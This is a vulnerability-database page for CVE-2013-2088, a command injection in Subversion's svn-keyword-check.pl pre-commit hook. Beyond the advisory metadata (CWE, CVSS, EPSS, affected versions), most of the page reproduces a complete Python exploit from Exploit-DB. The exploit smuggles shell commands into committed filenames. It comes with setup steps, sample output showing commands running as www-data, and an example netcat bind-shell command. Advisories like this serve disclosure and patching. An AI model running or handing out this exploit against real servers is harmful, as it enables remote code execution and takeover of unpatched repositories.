CVE-2013-2088 : Detail

CVE-2013-2088

A03-Injection
1.77%V3
Network
2013-07-31
08h00 +00:00
2017-09-18
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

contrib/hook-scripts/svn-keyword-check.pl in Subversion before 1.6.23 allows remote authenticated users with commit permissions to execute arbitrary commands via shell metacharacters in a filename.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.1 AV:N/AC:H/Au:S/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 40507

Publication date : 2016-10-11 22h00 +00:00
Author : GlacierZ0ne
EDB Verified : No

# This is an exploit for the subversion vulnerability published as CVE-2013-2088. # Author: GlacierZ0ne ([email protected]) # Exploit Type: Code Execution # Access Type: Authenticated Remote Exploit # Prerequisites: svn command line client available, # subversion server exposes webdav through apache, # user/password with commit privilege # The exploit has been tested with the following software: # * subversion 1.6.6 server on Ubuntu 10.06 server 64-bit # * subversion 1.6.12 (r955767) on Ubuntu 11.10 server 32-bit # * subversion client version 1.8.8 (r1568071) on Ubuntu 14.04 64-bit # The following conditions need to be met in order for this to work: # The pre-commit script svn-keyword-check.pl needs to be configured as # pre-commit hook. The version shipped with the subversion 1.6.6 contains # a bug which prevents it from being used at all. This bug must be fixed # (otherwise neither the exploit, nor the intented purpose of the script # will work) # This perl script can be downloaded from the archive source distribution # at http://archive.apache.org/dist/subversion/. Scripts before 1.6.23 # are vulnerable. # ############################################################### # 1. configure the pre-commit hook to use svn-keyword-check.pl # ############################################################### # Copy the svn-keyword-check.pl from the source distribution to the # /svn/repos/<your repository>/hooks directory. Rename pre-commit.tmpl # to pre-commit. Make sure both files are owned by the user running # apache (e.g. www-data) and have the executable flag set: # # notroot@ubuntu:/$ cd /svn/repositories/testrepo/hooks # notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo mv pre-commit.tmpl pre-commit # notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo chmod +x pre-commit # notroot@ubuntu:/svn/repos/testrepo/hooks$ ls -al # total 76 # drwxr-xr-x 2 www-data www-data 4096 2016-09-30 13:35 . # drwxr-xr-x 7 www-data www-data 4096 2016-09-05 16:28 .. # -rw-r--r-- 1 www-data www-data 2000 2016-09-05 15:23 post-commit.tmpl # -rw-r--r-- 1 www-data www-data 1663 2016-09-05 15:23 post-lock.tmpl # -rw-r--r-- 1 www-data www-data 2322 2016-09-05 15:23 post-revprop-change.tmpl # -rw-r--r-- 1 www-data www-data 1592 2016-09-05 15:23 post-unlock.tmpl # -rwxr-xr-x 1 www-data www-data 604 2016-09-30 13:32 pre-commit # -rw-r--r-- 1 www-data www-data 609 2016-09-05 19:10 pre-commit.tmpl # -rw-r--r-- 1 www-data www-data 2410 2016-09-05 15:23 pre-lock.tmpl # -rw-r--r-- 1 www-data www-data 2796 2016-09-05 15:23 pre-revprop-change.tmpl # -rw-r--r-- 1 www-data www-data 2100 2016-09-05 15:23 pre-unlock.tmpl # -rw-r--r-- 1 www-data www-data 2830 2016-09-05 15:23 start-commit.tmpl # -rwxr-xr-x 1 www-data www-data 8340 2016-09-30 13:35 svn-keyword-check.pl # notroot@ubuntu:/svn/repos/testrepo/hooks$ # According to the subversion documentation, svn-keyword-check.pl needs # to be called by pre-commit. svn-keyword-check.pl will return 1 if it # detects something that should prevent the commit. In that case, the # subversion server will cancel the commit. Here's how pre-commit looked # on my test server: # notroot@ubuntu:/svn/repos/testrepo/hooks$ cat pre-commit # #!/bin/sh # REPOS="$1" # TXN="$2" # # Make sure that the log message contains some text. # #jSVNLOOK=/usr/bin/svnlook # $SVNLOOK log -t "$TXN" "$REPOS" | \ # ep "[a-zA-Z0-9]" > /dev/null || exit 1 # # # Exit on all errors. # set -e # # # Check the files that are are listed in "svnlook changed" (except deleted # # files) for possible problems with svn:keywords set on binary files. # "$REPOS"/hooks/svn-keyword-check.pl --repos $REPOS --transaction $TXN # # # # # # # # # All checks passed, so allow the commit. # exit 0 # # ############################################################### # # 2. fix the bug in svn-keyword-check.pl # # ############################################################### # The script pre-commit will pass on repository and transaction to # the script svn-keyword-check.pl. Alternatively, it also accepts # repository and revision. However, specifying both transaction # and revision is illegal, only one of them is considered legal. # This reflects in the input parameter plausibility check # performed in line 89: # # if (defined($transaction) and !defined($revision)) { # croak "Can't define both revision and transaction!\n"; # } # # Unfortunately, there is an exclamation mark too much. It must # be # # if (defined($transaction) and defined($revision)) { # croak "Can't define both revision and transaction!\n"; # } # # The way this script is shipped in the 1.6.6 source distribution # no commit is possible at all. # # Before using the exploit you should first commit one file # manually so that the svn client can store your user/password # locally. # # Then, open a shell and navigate to the directory of your project # and start python cve-2013-2088-1.py <command>: # # kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py ifconfig # [+] Randfilename is mJHeSkya # [+] Created random file # [+] Submitted random file to version control # [+] Created fake file for cmd execution # [+] Exploit seems to work: # # eth0 Link encap:Ethernet HWaddr 00:0c:29:08:a3:1a # inet addr:192.168.26.136 Bcast:192.168.26.255 Mask:255.255.255.0 # inet6 addr: fe80::20c:29ff:fe08:a31a/64 Scope:Link # UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 # RX packets:1060 errors:0 dropped:0 overruns:0 frame:0 # TX packets:806 errors:0 dropped:0 overruns:0 carrier:0 # collisions:0 txqueuelen:1000 # RX bytes:172042 (172.0 KB) TX bytes:136684 (136.6 KB) # # lo Link encap:Local Loopback # inet addr:127.0.0.1 Mask:255.0.0.0 # inet6 addr: ::1/128 Scope:Host # UP LOOPBACK RUNNING MTU:16436 Metric:1 # RX packets:0 errors:0 dropped:0 overruns:0 frame:0 # TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 # collisions:0 txqueuelen:0 # RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) # # kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py id # [+] Randfilename is WmolHiuv # [+] Created random file # [+] Submitted random file to version control # [+] Created fake file for cmd execution # [+] Exploit seems to work: # # uid=33(www-data) gid=33(www-data) groups=33(www-data) # # # Important things to notice # * For each command execution the exploit will put a file under # version control. If you submit a lot of commands you will # create a lot of files with random 8 alphanumeric character # file names in your repository. # * Your command must not contain a / since file names must not # contain a /. In the author's test environment the current # working directory of apache was the root folder /. # Therefore, the exploit will replace / in the command with # $(pwd). This worked fine for the author. # In your environment this might be different. As first thing # execute $(pwd) in order to check if this works for you, too. # * The command execution assumes that your command prints something # to the terminal and exits. If you know your command will not # immediately terminate (e.g. because you're starting a reverse/ # bind shell), provide the -d or --dont-terminate flag: # python svn_exploit2.py -d "/bin/bash 0</tmp/mypipe | nc -l 192.168.1.100 4444 1> /tmp/mypipe" # # # import sys import subprocess import argparse import random import os if __name__ == "__main__": lowerupper = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" slash_replacement = "$(pwd)" cwd = os.getcwd() parser = argparse.ArgumentParser (usage="python {} [options] command".format (sys.argv [0]), epilog="\x0a\x0a") parser.add_argument (dest="command", help="Command to execute") parser.add_argument ("-d", "--dont-terminate", help="don't force output be sent back to the client. Useful for reverse shell connections.", action="store_true") # # args handling # if (len(sys.argv) <= 1): parser.print_help () sys.exit (0) args = parser.parse_args () if not args.command: parser.print_help () sys.exit (0) # # / cannot be used in the command because svn will interprete it as # file separator. Therefore you have to use a workaround. Here, # $(pwd) works great for us. # command = args.command if command.find ("/") != -1: command = command.replace("/", slash_replacement) # # prepare output files for stdout, stderr # sout = open ("stdout", "w+") serr = open ("stderr", "w+") randfilename = "" for idx in range (0, 8): randfilename = randfilename + lowerupper [random.randint (0,51)] print ("[+] Randfilename is {}".format(randfilename)) f = open (randfilename, "w+") f.write ("You've been pwned by GlacierZ0ne'") # write 4 f.flush () f.close () p = subprocess.Popen (["svn", "add", "./{randfilename}".format (randfilename=randfilename)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) c = p.communicate () sout.write (c[0]) if len(c[1]) > 0: print ("[-] Create random file failed:") print (c[1]) sys.exit (0) print ("[+] Created random file") p = subprocess.Popen (["svn", "commit", "-m", "I pwned you", "./{randfilename}".format (randfilename=randfilename)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) c = p.communicate () sout.write (c[0]) if len(c[1]) > 0: print ("[-] Submission of random file failed:") print (c[1]) sys.exit (0) print ("[+] Submitted random file to version control") fakefilename = None if args.dont_terminate == True: fakefilename = "{}; {}".format (randfilename, command) else: fakefilename = "{}; {} 1>&2; exit 1".format (randfilename, command) f = open (fakefilename, "w+") f.write ("You've been pwned by GlacierZ0ne") # write 4 f.flush () f.close () p = subprocess.Popen (["svn", "add", "{fakefilename}" .format (cwd=cwd, fakefilename=fakefilename)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) c = p.communicate () sout.write (c[0]) if len(c[1]) > 0: print ("[-] Creation of fake file failed:") print (c[1]) sys.exit (0) print ("[+] Created fake file for cmd execution") p = subprocess.Popen (["svn", "commit", "-m", "I pwned you", "{fakefilename}" .format (cwd=cwd, fakefilename=fakefilename)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) c = p.communicate () sout.write (c[0]) if len(c[1]) == 0: if not args.dont_terminate: print "[-] Something went wrong, pre-commit hook didn't kick in." else: print "[!] Done" sys.exit (0) else: idx0= c[1].find ("Commit blocked by pre-commit hook") idx = c[1].find ("failed with this output") if idx0 != -1 and idx != -1: print ("[+] Exploit seems to work: ") print (c[1][idx + len("failed with this output") + 1:]) sout.flush () sout.close () serr.flush () serr.close ()

Products Mentioned

Configuraton 0

Apache>>Subversion >> Version To (including) 1.6.21

Apache>>Subversion >> Version 1.6.0

Apache>>Subversion >> Version 1.6.1

Apache>>Subversion >> Version 1.6.2

Apache>>Subversion >> Version 1.6.3

Apache>>Subversion >> Version 1.6.4

Apache>>Subversion >> Version 1.6.5

Apache>>Subversion >> Version 1.6.6

Apache>>Subversion >> Version 1.6.7

Apache>>Subversion >> Version 1.6.8

Apache>>Subversion >> Version 1.6.9

Apache>>Subversion >> Version 1.6.10

Apache>>Subversion >> Version 1.6.11

Apache>>Subversion >> Version 1.6.12

Apache>>Subversion >> Version 1.6.13

Apache>>Subversion >> Version 1.6.14

Apache>>Subversion >> Version 1.6.15

Apache>>Subversion >> Version 1.6.16

Apache>>Subversion >> Version 1.6.17

Apache>>Subversion >> Version 1.6.18

Apache>>Subversion >> Version 1.6.19

Apache>>Subversion >> Version 1.6.20

Collabnet>>Subversion >> Version 1.6.17

Configuraton 0

Opensuse>>Opensuse >> Version 11.4

References

https://www.exploit-db.com/exploits/40507/
Tags : exploit, x_refsource_EXPLOIT-DB